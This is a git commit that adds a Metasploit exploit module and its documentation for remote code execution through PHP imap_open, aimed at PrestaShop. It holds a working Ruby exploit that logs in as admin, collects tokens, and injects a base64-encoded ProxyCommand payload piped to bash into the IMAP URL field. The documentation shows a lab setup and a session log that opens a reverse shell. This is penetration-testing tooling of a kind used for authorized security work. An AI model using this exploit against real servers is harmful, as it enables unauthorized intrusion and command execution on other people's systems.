adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

php_imap_open_rce

Browse Source
This commit is contained in:
h00die
2018-11-18 21:28:19 -05:00
parent fd3ece3f9b
commit 4b09584047
2 changed files with 331 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/linux/http/php_imap_open_rce.md
+156
View File
@@ -0,0 +1,156 @@
## Vulnerable Application
The [imap_open](http://php.net/manual/en/function.imap-open.php) function within php,
if called without the `/norsh` flag, will attempt to preauthenticate an IMAP session.
On Debian based systems, including Ubuntu, `rsh` is mapped to the ssh binary. Ssh's
`ProxyCommand` option can be passed from `imap_open` to execute arbitrary commands.
While many custom applications may use `imap_open`, it is reported that the following
applications are vulnerable:
* instantcms
* HostCMS
* e107_2
* prestashop
* SuiteCRM
* SugarCRM
Prestashop exploitation requires the admin URI, and administrator credentials.
### Prestashop on Ubuntu 16.04
Mostly derived from [websiteforstudents.com](https://websiteforstudents.com/install-prestashop-on-ubuntu-17-04-17-10-with-apache2-mariadb-and-php/),
with a few tweeks for Ubuntu 16.04, and to install PHP's imap mod.
```
sudo apt install apache2
sudo sed -i "s/Options Indexes FollowSymLinks/Options FollowSymLinks/" /etc/apache2/apache2.conf
sudo systemctl stop apache2.service
sudo systemctl start apache2.service
sudo systemctl enable apache2.service
sudo apt-get install mariadb-server mariadb-client
sudo systemctl stop mysql.service
sudo systemctl start mysql.service
sudo systemctl enable mysql.service
sudo mysql_secure_installation
sudo systemctl restart mysql.service
sudo apt install php libapache2-mod-php php-common php-mbstring php-xmlrpc php-soap php-gd php-xml php-intl php-mysql php-cli php-mcrypt php-ldap php-zip php-curl php-imap
sudo phpenmod imap
sudo mysql -u root -p
```
```
CREATE USER 'prestashopuser'@'localhost' IDENTIFIED BY 'new_password_here';
GRANT ALL ON prestashop.* TO 'prestashopuser'@'localhost' IDENTIFIED BY 'user_password_here' WITH GRANT OPTION;
FLUSH PRIVILEGES;
EXIT;
```
```
cd /tmp && curl -O https://download.prestashop.com/download/releases/prestashop_1.7.2.4.zip
unzip prestashop_1.7.2.4.zip
sudo mkdir -p /var/www/html/prestashop
sudo unzip prestashop.zip -d /var/www/html/prestashop/
sudo chown -R www-data:www-data /var/www/html/prestashop/
sudo chmod -R 755 /var/www/html/prestashop/
sudo nano /etc/apache2/sites-available/prestashop.conf
```
Utilize the following configuration:
```
<VirtualHost *:80>
ServerAdmin admin@example.com
DocumentRoot /var/www/html/prestashop/
ServerName example.com
ServerAlias www.example.com
<Directory /var/www/html/prestashop/>
Options +FollowSymlinks
AllowOverride All
Require all granted
</Directory>
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
</VirtualHost>
```
```
sudo a2ensite prestashop.conf
sudo a2enmod rewrite
sudo a2dissite 000-default
sudo systemctl restart apache2.service
```
Browse to the website, and install with default information.
```
sudo rm -rf /var/www/html/prestashop/install/
```
Now browse to `/admin`, and the first time you'll be redirected to the admin URI. If not, `sudo ls /var/www/html/prestashop/admin*`.
## Verification Steps
1. Install a vulnerable application
2. Start msfconsole
3. Do: ```use exploit/linux/http/php_imap_open_rce```
4. Do: ```set TARGETURI [URI]```
5. Do: ```set USERNAME [username]```
6. Do: ```set PASSWORD [password]```
7. Do: ```set target [target]```
8. Do: ```run```
9. You should get a shell.
## Options
**TARGETURI**
The URI for the target. This may change by target. Default is ``.
Prestashop should be the admin URI, similar to `/admin2769gx8k3`.
## Scenarios
### PrestaShop 1.7.2.4 on Ubuntu 16.04.4 with PHP 7.0
```
resource (presta.rb)> use exploit/linux/http/php_imap_open_rce
resource (presta.rb)> set TARGETURI /admin2769gx8k3
TARGETURI => /admin2769gx8k3
resource (presta.rb)> set USERNAME ubuntu@none.com
USERNAME => ubuntu@none.com
resource (presta.rb)> set PASSWORD ubuntuubuntu
PASSWORD => ubuntuubuntu
resource (presta.rb)> set rhosts 192.168.2.139
rhosts => 192.168.2.139
resource (presta.rb)> set verbose true
verbose => true
resource (presta.rb)> exploit
[*] Started reverse TCP double handler on 192.168.2.117:4444
[*] Redirected to http://192.168.2.139/admin2769gx8k3/
[*] Redirected to http://192.168.2.139/admin2769gx8k3/index.php?controller=AdminLogin&token=6dab1f7b4eea17d2b44a8929ead9df68
[*] Token: 6dab1f7b4eea17d2b44a8929ead9df68 and Login Redirect: http://192.168.2.139/admin2769gx8k3/&token=09283f9efc45fc75eca3b8d5f1b1f92f
[*] Logging in with ubuntu@none.com:ubuntuubuntu
[*] Login JSON Response: {"hasErrors":false,"redirect":"http:\/\/192.168.2.139\/admin2769gx8k3\/index.php?controller=AdminDashboard&token=e324e8b387afb1874947db9b1ba411c8"}
[+] Login Success, loading admin dashboard to pull tokens
[*] Customer Threads Token: ec653c8bfc09754fc63aaa94101911dc
[+] Sending Payload with Final Token: ec653c8bfc09754fc63aaa94101911dc
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo ivxULEW4eweTiis7;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "ivxULEW4eweTiis7\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.2.117:4444 -> 192.168.2.139:41746) at 2018-11-18 21:08:50 -0500
uname -a
Linux ubuntu1604 4.4.0-138-generic #164-Ubuntu SMP Tue Oct 2 17:16:02 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
whoami
www-data
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
modules/exploits/linux/http/php_imap_open_rce.rb
+175
View File
@@ -0,0 +1,175 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'php imap_open Remote Code Execution',
'Description' => %q{
The imap_open function within php, if called without the /norsh flag, will attempt to preauthenticate an
IMAP session. On Debian based systems, including Ubuntu, rsh is mapped to the ssh binary. Ssh's ProxyCommand
option can be passed from imap_open to execute arbitrary commands.
While many custom applications may use imap_open, it is reported that the following applications are vulnerable:
instantcms, HostCMS, e107_2, prestashop, SuiteCRM, SugarCRM.
Prestashop exploitation requires the admin URI, and administrator credentials.
},
'Author' =>
[
'Twoster', # Vulnerability discovery and PoC
'h00die' # Metasploit Module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'https://web.archive.org/web/20181118213536/https://antichat.com/threads/463395' ],
[ 'URL', 'https://github.com/Bo0oM/PHP_imap_open_exploit' ]
],
'Privileged' => false,
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD,
'Targets' =>
[
[ 'prestashop', {} ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 19 2018'))
register_options(
[
OptString.new('TARGETURI', [ true, "Base directory path", '/admin2769gx8k3']),
OptString.new('USERNAME', [ true, "Username to authenticate with", '']),
OptString.new('PASSWORD', [ false, "Password to authenticate with", ''])
])
end
def check
if target.name =~ /prestashop/
uri = normalize_uri(target_uri.path)
res = send_request_cgi({'uri' => uri})
if res && (res.code == 301 || res.code == 302)
return CheckCode::Detected
end
end
CheckCode::Safe
end
def command
#payload is base64 encoded, and stuffed into the SSH option.
enc_payload = Rex::Text.encode_base64(payload.encoded)
command = "-oProxyCommand=`echo #{enc_payload}|base64 -d|bash`"
#final payload can not contain spaces, however $IFS$() will return the space we require
command.gsub!(' ', '$IFS$()')
end
def exploit
if target.name =~ /prestashop/
uri = normalize_uri(target_uri.path)
res = send_request_cgi({'uri' => uri})
if res && res.code != 301
print_error('Admin redirect not found, check URI. Should be something similar to /admin2769gx8k3')
return
end
#There are a bunch of redirects that happen, so we automate going through them to get to the login page.
while res.code == 301 || res.code == 302
cookie = res.get_cookies
uri = res.headers['Location']
vprint_status("Redirected to #{uri}")
res = send_request_cgi({'uri' => uri})
end
#Tokens are generated for each URL or sub-component, we need valid ones!
/.*token=(?<token>\w{32})/ =~ uri
/id="redirect" value="(?<redirect>.*)"\/>/ =~ res.body
cookie = res.get_cookies
vprint_status("Token: #{token} and Login Redirect: #{redirect}")
print_status("Logging in with #{datastore['USERNAME']}:#{datastore['PASSWORD']}")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path) + '/index.php',
'cookie' => cookie,
'vars_post' => {
'ajax' => 1,
'token' => '',
'controller' => 'AdminLogin',
'submitLogin' => '1',
'passwd' => datastore['PASSWORD'],
'email' => datastore['USERNAME'],
'redirect' => redirect
},
'vars_get' => {
'rand' => '1542582364810' #not sure if this will hold true forever, I didn't see where it is being generated
}
)
if res && res.body.include?('Invalid password')
print_error('Invalid Login')
return
end
vprint_status("Login JSON Response: #{res.body}")
uri = JSON.parse(res.body)['redirect']
cookie = res.get_cookies
print_good('Login Success, loading admin dashboard to pull tokens')
res = send_request_cgi({'uri' => uri, 'cookie' => cookie})
#print_status(res.code.to_s)
#if res.code == 301 || res.code == 302
# print_status("#{res.code} -> #{res.headers['Location']}")
# cookie = res.get_cookies
# uri = res.headers['Location']
# res = send_request_cgi({'uri' => uri, 'cookie' => cookie})
#end
/AdminCustomerThreads&amp;token=(?<token>\w{32})/ =~ res.body
vprint_status("Customer Threads Token: #{token}")
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path) + '/index.php',
'cookie' => cookie,
'vars_get' => {
'controller' => 'AdminCustomerThreads',
'token' => token
}
})
/form method="post" action="index\.php\?controller=AdminCustomerThreads&amp;token=(?<token>\w{32})/ =~ res.body
print_good("Sending Payload with Final Token: #{token}")
data = Rex::MIME::Message.new
data.add_part('1', nil, nil, 'form-data; name="PS_CUSTOMER_SERVICE_FILE_UPLOAD"')
data.add_part("Dear Customer,\n\nRegards,\nCustomer service", nil, nil, 'form-data; name="PS_CUSTOMER_SERVICE_SIGNATURE_1"')
data.add_part("x #{command}}", nil, nil, 'form-data; name="PS_SAV_IMAP_URL"')
data.add_part('143', nil, nil, 'form-data; name="PS_SAV_IMAP_PORT"')
data.add_part(Rex::Text.rand_text_alphanumeric(8), nil, nil, 'form-data; name="PS_SAV_IMAP_USER"')
data.add_part(Rex::Text.rand_text_alphanumeric(8), nil, nil, 'form-data; name="PS_SAV_IMAP_PWD"')
data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_DELETE_MSG"')
data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_CREATE_THREADS"')
data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_POP3"')
data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_NORSH"')
data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_SSL"')
data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_VALIDATE-CERT"')
data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_NOVALIDATE-CERT"')
data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_TLS"')
data.add_part('0', nil, nil, 'form-data; name="PS_SAV_IMAP_OPT_NOTLS"')
data.add_part('', nil, nil, 'form-data; name="submitOptionscustomer_thread"')
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path) + '/index.php',
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s,
'cookie' => cookie,
'vars_get' => {
'controller' => 'AdminCustomerThreads',
'token' => token
}
)
if res && res.body.include?('imap Is Not Installed On This Server')
print_error('PHP IMAP mod not installed/enabled ')
end
end
end
end